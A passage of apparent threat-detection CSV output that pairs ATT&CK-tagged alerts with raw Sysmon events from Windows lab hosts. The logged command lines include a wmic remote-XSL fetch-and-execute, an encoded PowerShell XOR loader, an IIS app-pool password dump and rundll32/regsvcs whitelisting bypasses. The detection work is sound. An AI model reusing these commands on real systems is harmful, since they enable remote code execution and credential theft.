<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-CE6C-5CE6-0000-002047F30000</Data>
<Data Name=""LogonId"">0xf347</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-CE6D-5CE6-0000-00109E190100</Data>
<Data Name=""ParentProcessId"">1472</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558630149.576625,2019-05-23T20:49:09.576625+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-23T16:49:08.422099Z"">
</TimeCreated>
<EventRecordID>896</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-23 16:49:08.258</Data>
<Data Name=""ProcessGuid"">365ABB72-CF04-5CE6-0000-001010F20C00</Data>
<Data Name=""ProcessId"">4056</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">c:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-CE6C-5CE6-0000-002047F30000</Data>
<Data Name=""LogonId"">0xf347</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-CF01-5CE6-0000-00105DA50C00</Data>
<Data Name=""ParentProcessId"">3872</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WMIC.exe</Data>
<Data Name=""ParentCommandLine"">wmic process list /format:&quot;https://a.uguu.se/x50IGVBRfr55_test.xsl&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436009.646278,2019-07-30T01:33:29.646278+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:29.565736Z"">
</TimeCreated>
<EventRecordID>4919</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:28.756</Data>
<Data Name=""ProcessGuid"">747F3D96-6628-5D3F-0000-0010B1968800</Data>
<Data Name=""ProcessId"">5708</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1555606693.389836,2019-04-18T20:58:13.389836+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:58:12.979246Z"">
</TimeCreated>
<EventRecordID>18</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""164"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 16:58:12.919</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\cryptdll.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Cryptography Manager</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.389836,2019-04-18T20:58:13.389836+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:58:12.979246Z"">
</TimeCreated>
<EventRecordID>18</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""164"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 16:58:12.919</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\cryptdll.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Cryptography Manager</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.352255,2019-05-27T05:29:18.352255+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.352255Z"">
</TimeCreated>
<EventRecordID>5922</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.322</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-00104C92FF00</Data>
<Data Name=""ProcessId"">3100</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:processmodel.password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1552853872.97915,2019-03-18T00:17:52.979150+04:00,,Threat,Low,Found User (PC04\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-17T20:17:52.949107Z"">
</TimeCreated>
<EventRecordID>5260</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1852"" ThreadID=""464"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC04.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-17 20:17:52.899</Data>
<Data Name=""ProcessGuid"">365ABB72-AB70-5C8E-0000-0010781D0A00</Data>
<Data Name=""ProcessId"">3272</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\</Data>
<Data Name=""User"">PC04\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-A960-5C8E-0000-002004C00300</Data>
<Data Name=""LogonId"">0x3c004</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-A965-5C8E-0000-0010D9100400</Data>
<Data Name=""ParentProcessId"">3884</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot; DATAUS~1.DLL f8755 4624665222 rd)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:22.066496Z"">
</TimeCreated>
<EventRecordID>424261</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:22.062</Data>
<Data Name=""ProcessGuid"">747F3D96-51FE-5F93-0000-0010DC535E00</Data>
<Data Name=""ProcessId"">8920</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; DATAUS~1.DLL f8755 4624665222 rd</Data>
<Data Name=""CurrentDirectory"">C:\PROGRA~3\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51FD-5F93-0000-00103B425E00</Data>
<Data Name=""ParentProcessId"">7504</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; DATAUS~1.DLL f8755 4624665222 rd ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:22.066496Z"">
</TimeCreated>
<EventRecordID>424261</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:22.062</Data>
<Data Name=""ProcessGuid"">747F3D96-51FE-5F93-0000-0010DC535E00</Data>
<Data Name=""ProcessId"">8920</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; DATAUS~1.DLL f8755 4624665222 rd</Data>
<Data Name=""CurrentDirectory"">C:\PROGRA~3\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51FD-5F93-0000-00103B425E00</Data>
<Data Name=""ParentProcessId"">7504</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; DATAUS~1.DLL f8755 4624665222 rd ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:22.066496Z"">
</TimeCreated>
<EventRecordID>424261</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:22.062</Data>
<Data Name=""ProcessGuid"">747F3D96-51FE-5F93-0000-0010DC535E00</Data>
<Data Name=""ProcessId"">8920</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; DATAUS~1.DLL f8755 4624665222 rd</Data>
<Data Name=""CurrentDirectory"">C:\PROGRA~3\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
